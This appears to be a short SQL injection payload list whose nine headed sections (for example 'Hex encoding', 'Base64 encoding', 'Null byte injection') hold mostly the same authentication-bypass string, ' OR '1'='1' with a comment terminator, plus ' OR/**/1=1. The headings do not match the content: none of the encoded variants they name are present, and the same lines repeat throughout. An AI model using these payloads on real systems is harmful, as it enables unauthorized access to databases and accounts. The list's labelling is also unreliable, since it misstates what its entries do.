# Encoding techniques
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #

# Character replacement
' OR/**/1=1
' OR/**/1=1
' OR/**/1=1

# Comment-based bypass
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #

# Space-based bypass
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --

# Double encoding
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --

# Hex encoding
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --

# Unicode encoding
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --

# Null byte injection
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --

# Base64 encoding
' OR '1'='1' --
' OR '1'='1' --
' OR '1'='1' --
